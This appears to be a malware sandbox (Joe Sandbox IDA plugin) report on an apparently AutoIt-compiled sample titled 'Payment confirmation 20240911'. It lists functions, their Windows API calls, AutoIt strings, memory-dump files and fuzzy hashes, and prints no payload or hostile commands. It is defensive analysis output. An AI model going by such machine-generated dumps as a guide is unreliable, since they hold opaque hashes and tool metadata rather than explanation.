                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction ID: d9dea03eabea2d5dd50b2bd799531603f01c49aa781ed860a7b2471a3ccbe1f0
                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction Fuzzy Hash: 00C195722091934AEF2F863D847463EFEE15AA26F931A076DF4B3CB5C5EE14D164C620
                                          Function 01300677 Relevance: .3, Instructions: 323COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction ID: a8a3c99513c0d7f4fd0721a3b520d17a5ee03f559073728df5f023f6ed65855f
                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction Fuzzy Hash: 63C191722091934AFF2F463D847463EBEE15AA26F931A076DF4B3CB4D5EE24C164C620
                                          Function 012EF5C5 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29f59c322b46d128466e64c035c5082d7c796d0a8b846deb10074d6d1ff69d51
                                          • Instruction ID: cd37ede44a566b45bcd2e174fe5164f29d559fb96d133ca1982c70662fd5b975
                                          • Opcode Fuzzy Hash: 29f59c322b46d128466e64c035c5082d7c796d0a8b846deb10074d6d1ff69d51
                                          • Instruction Fuzzy Hash: 1621D1F5C20746DFD782AF308466851F7B2BB36B643D245BED45086A10F37A9D92DB80
                                          Function 0133A750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 0133A7A5
                                          • DeleteObject.GDI32(00000000), ref: 0133A7B7
                                          • DestroyWindow.USER32 ref: 0133A7C5
                                          • GetDesktopWindow.USER32 ref: 0133A7DF
                                          • GetWindowRect.USER32(00000000), ref: 0133A7E6
                                          • SetRect.USER32 ref: 0133A927
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0133A937
                                          • CreateWindowExW.USER32 ref: 0133A97F
                                          • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0133A98B
                                          • CreateWindowExW.USER32 ref: 0133A9C5
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0133A9E7
                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0133A9FA
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0133AA05
                                          • GlobalLock.KERNEL32(00000000), ref: 0133AA0E
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 0133AA1D
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0133AA26
                                          • CloseHandle.KERNEL32(00000000), ref: 0133AA2D
                                          • GlobalFree.KERNEL32(00000000), ref: 0133AA38
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 0133AA4A
                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0136D9BC,00000000), ref: 0133AA60
                                          • GlobalFree.KERNEL32(00000000), ref: 0133AA70
                                          • CopyImage.USER32 ref: 0133AA96
                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0133AAB5
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 0133AAD7
                                          • ShowWindow.USER32(00000004), ref: 0133ACC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 2211948467-2373415609
                                          • Opcode ID: 964b8b987169fff0f4f1cc11669cc1e9094a46ab11e13039cad3bd0c3ae3c55b
                                          • Instruction ID: 1a204ebd04a981fe1aabbf47a121024249a1cfd61cb2a14a19d1f19120a4b9e5
                                          • Opcode Fuzzy Hash: 964b8b987169fff0f4f1cc11669cc1e9094a46ab11e13039cad3bd0c3ae3c55b
                                          • Instruction Fuzzy Hash: 5E027C71A10219EFDB24DFA8CC88EAE7FB9EB48314F048159F945EB2A4D7719D01CB60
                                          Function 0134D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 0134D0EB
                                          • GetSysColorBrush.USER32 ref: 0134D11C
                                          • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,0135F352,?,?,?), ref: 0134D128
                                          • SetBkColor.GDI32(?,000000FF), ref: 0134D142
                                          • SelectObject.GDI32(?,00000000), ref: 0134D151
                                          • InflateRect.USER32 ref: 0134D17C
                                          • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,0135F352,?,?,?), ref: 0134D184
                                          • CreateSolidBrush.GDI32(00000000), ref: 0134D18B
                                          • FrameRect.USER32 ref: 0134D19A
                                          • DeleteObject.GDI32(00000000), ref: 0134D1A1
                                          • InflateRect.USER32 ref: 0134D1EC
                                          • FillRect.USER32 ref: 0134D21E
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0134D249
                                            • Part of subcall function 0134D385: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?), ref: 0134D3BE
                                            • Part of subcall function 0134D385: SetTextColor.GDI32(?,?), ref: 0134D3C2
                                            • Part of subcall function 0134D385: GetSysColorBrush.USER32 ref: 0134D3D8
                                            • Part of subcall function 0134D385: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D3E3
                                            • Part of subcall function 0134D385: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D400
                                            • Part of subcall function 0134D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0134D40E
                                            • Part of subcall function 0134D385: SelectObject.GDI32(?,00000000), ref: 0134D41F
                                            • Part of subcall function 0134D385: SetBkColor.GDI32(?,00000000), ref: 0134D428
                                            • Part of subcall function 0134D385: SelectObject.GDI32(?,?), ref: 0134D435
                                            • Part of subcall function 0134D385: InflateRect.USER32 ref: 0134D454
                                            • Part of subcall function 0134D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0134D46B
                                            • Part of subcall function 0134D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0134D480
                                            • Part of subcall function 0134D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0134D4A8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 3521893082-0
                                          • Opcode ID: 707e3a9bc072a8f905632cdc12f38f263919b0c0d2bac30175371d73afa908a3
                                          • Instruction ID: ddb83c7941db4726edaa35b73fd33fb0369a93086fafdeab2f52e7413fbd4319
                                          • Opcode Fuzzy Hash: 707e3a9bc072a8f905632cdc12f38f263919b0c0d2bac30175371d73afa908a3
                                          • Instruction Fuzzy Hash: 5F917D71108301EFDB619FA4DC08E5BBBEDFB89324F104A19FAA2961E4D771E944CB52
                                          Function 012E48C8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32 ref: 012E4956
                                          • DeleteObject.GDI32(00000000), ref: 012E4998
                                          • DeleteObject.GDI32(00000000), ref: 012E49A3
                                          • DestroyIcon.USER32(00000000), ref: 012E49AE
                                          • DestroyWindow.USER32 ref: 012E49B9
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0135E179
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0135E1B2
                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0135E5E0
                                            • Part of subcall function 012E49CA: InvalidateRect.USER32(?,00000000,00000001), ref: 012E4A23
                                          • SendMessageW.USER32 ref: 0135E627
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0135E63E
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0135E654
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0135E65F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          • Opcode ID: f7dccf8aef8614720c64a4dd5fd1d48f12dd962e8991d1b0f338a733d2733581
                                          • Instruction ID: 85daf3c721f68759fc984dbfbbdb8e209775f49cae233c08fc0bda20168c23f9
                                          • Opcode Fuzzy Hash: f7dccf8aef8614720c64a4dd5fd1d48f12dd962e8991d1b0f338a733d2733581
                                          • Instruction Fuzzy Hash: F012C030600242DFDB61DF18C488FA9BBE5FF44708F5445B9EA99DB262C731EA45CBA1
                                          Function 0133A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32 ref: 0133A42A
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0133A4E9
                                          • SetRect.USER32 ref: 0133A527
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0133A539
                                          • CreateWindowExW.USER32 ref: 0133A57F
                                          • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0133A58B
                                          • CreateWindowExW.USER32 ref: 0133A5CF
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0133A5DE
                                          • GetStockObject.GDI32(00000011), ref: 0133A5EE
                                          • SelectObject.GDI32(00000000,00000000), ref: 0133A5F2
                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 0133A602
                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 0133A60B
                                          • DeleteDC.GDI32(00000000), ref: 0133A614
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0133A642
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0133A659
                                          • CreateWindowExW.USER32 ref: 0133A694
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0133A6A8
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0133A6B9
                                          • CreateWindowExW.USER32 ref: 0133A6E9
                                          • GetStockObject.GDI32(00000011), ref: 0133A6F4
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0133A6FF
                                          • ShowWindow.USER32(00000004), ref: 0133A709
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: e0f5843ddd1a3754e923450362187042855548c6e4b9d087056b51574f20a395
                                          • Instruction ID: a249cb82d5deecdf71597c9d6b9571a18c573aec751c9b83f3d510802c4aa89b
                                          • Opcode Fuzzy Hash: e0f5843ddd1a3754e923450362187042855548c6e4b9d087056b51574f20a395
                                          • Instruction Fuzzy Hash: CBA17BB1A50215BFEB24DBA9DC49FAE7BBDEB44714F008114FA54A72D0D7B4AD00CB64
                                          Function 0132E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0132E45E
                                          • GetDriveTypeW.KERNEL32(?,0137DC88,?,\\.\,0137DBF0), ref: 0132E54B
                                          • SetErrorMode.KERNEL32(00000000,0137DC88,?,\\.\,0137DBF0), ref: 0132E6B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: 6334861fdf9e1ecefc072be868507db0786d6c67cb64b468c41c16283c663695
                                          • Instruction ID: f010dbac6da5d74ecf232d0074e149bebedc8f7adc353de0814d2d27ea890d96
                                          • Opcode Fuzzy Hash: 6334861fdf9e1ecefc072be868507db0786d6c67cb64b468c41c16283c663695
                                          • Instruction Fuzzy Hash: A651F470218716EBCB20FF2AD89683AB7D4BB5462CF50893DE44A9B750E730DD49CB42
                                          Function 0134C4F9 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 447windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0134C598
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0134C64E
                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0134C669
                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0134C925
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: 0$`"u
                                          • API String ID: 2326795674-2270789441
                                          • Opcode ID: 72f7f12f6d1740b3d66796a62374924cea14a0c3dd27414a7d6ace34f1fcc5c2
                                          • Instruction ID: 75edb275439370ed96d512496e4098e0ef506e482b8ca9559c0f5beb8f455d3e
                                          • Opcode Fuzzy Hash: 72f7f12f6d1740b3d66796a62374924cea14a0c3dd27414a7d6ace34f1fcc5c2
                                          • Instruction Fuzzy Hash: 58F1E571206341AFF721CF28C884BAABFE8FF45758F085529F695D62A1C774E844CB52
                                          Function 012EC714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          • Opcode ID: dc566ef2ffa8f718389fa98a4171baeb11d3ab2b9564f2d55c22f7360c973347
                                          • Instruction ID: cf4ae9c0c66392ee32358e94dc77e73842bab631ae8debf445adde6ca324aeda
                                          • Opcode Fuzzy Hash: dc566ef2ffa8f718389fa98a4171baeb11d3ab2b9564f2d55c22f7360c973347
                                          • Instruction Fuzzy Hash: 03614A7129070777DB26EAAD8C5AFBB37ECBF15748F440028FE41B6181EBA4C511C2A1
                                          Function 01346189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 01346245
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 3964851224-45149045
                                          • Opcode ID: 5680860c50dea0379d9f44af1c038464cc6cc263edaa2b15a898566a02ad6e60
                                          • Instruction ID: 2236c9dcd3e4a175255e4e2792ff0da7b711fc18b8db601c118d73a65ca45a6e
                                          • Opcode Fuzzy Hash: 5680860c50dea0379d9f44af1c038464cc6cc263edaa2b15a898566a02ad6e60
                                          • Instruction Fuzzy Hash: 3CC1E974214206CFCB08EF18C550A7DB7D6BFA565CF04485CE9865B3A5CB31E90BCB82
                                          Function 0134B4D4 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 400windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0134B5C0
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0134B5D1
                                          • CharNextW.USER32(0000014E), ref: 0134B600
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0134B641
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0134B657
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0134B668
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0134B685
                                          • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 0134B6D7
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0134B6ED
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0134B71E
                                          • _memset.LIBCMT ref: 0134B743
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0134B78C
                                          • _memset.LIBCMT ref: 0134B7EB
                                          • SendMessageW.USER32 ref: 0134B815
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0134B86D
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0134B91A
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0134B93C
                                          • GetMenuItemInfoW.USER32 ref: 0134B986
                                          • SetMenuItemInfoW.USER32 ref: 0134B9B3
                                          • DrawMenuBar.USER32(?), ref: 0134B9C2
                                          • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 0134B9EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0$`"u
                                          • API String ID: 1073566785-2270789441
                                          • Opcode ID: e52a13072acc241383d7893152059c4b3204c3dc465b8db5d59baf4f276ad2a0
                                          • Instruction ID: 81d301d36564c5d034ec38d1fae52e28ef3c6cbecbb63a8fefd75795bd24f5e7
                                          • Opcode Fuzzy Hash: e52a13072acc241383d7893152059c4b3204c3dc465b8db5d59baf4f276ad2a0
                                          • Instruction Fuzzy Hash: D3E16F75900219ABEF219F99CC84AEEBFFCEF05768F008155FA15AA194DB70DA40CF60
                                          Function 0134D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?), ref: 0134D3BE
                                          • SetTextColor.GDI32(?,?), ref: 0134D3C2
                                          • GetSysColorBrush.USER32 ref: 0134D3D8
                                          • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D3E3
                                          • CreateSolidBrush.GDI32(?), ref: 0134D3E8
                                          • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D400
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0134D40E
                                          • SelectObject.GDI32(?,00000000), ref: 0134D41F
                                          • SetBkColor.GDI32(?,00000000), ref: 0134D428
                                          • SelectObject.GDI32(?,?), ref: 0134D435
                                          • InflateRect.USER32 ref: 0134D454
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0134D46B
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0134D480
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0134D4A8
                                          • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D4CF
                                          • InflateRect.USER32 ref: 0134D4ED
                                          • DrawFocusRect.USER32 ref: 0134D4F8
                                          • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0134D0B5), ref: 0134D506
                                          • SetTextColor.GDI32(?,00000000), ref: 0134D50E
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0134D522
                                          • SelectObject.GDI32(?,0134D0B5), ref: 0134D539
                                          • DeleteObject.GDI32(?), ref: 0134D544
                                          • SelectObject.GDI32(?,?), ref: 0134D54A
                                          • DeleteObject.GDI32(?), ref: 0134D54F
                                          • SetTextColor.GDI32(?,?), ref: 0134D555
                                          • SetBkColor.GDI32(?,?), ref: 0134D55F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
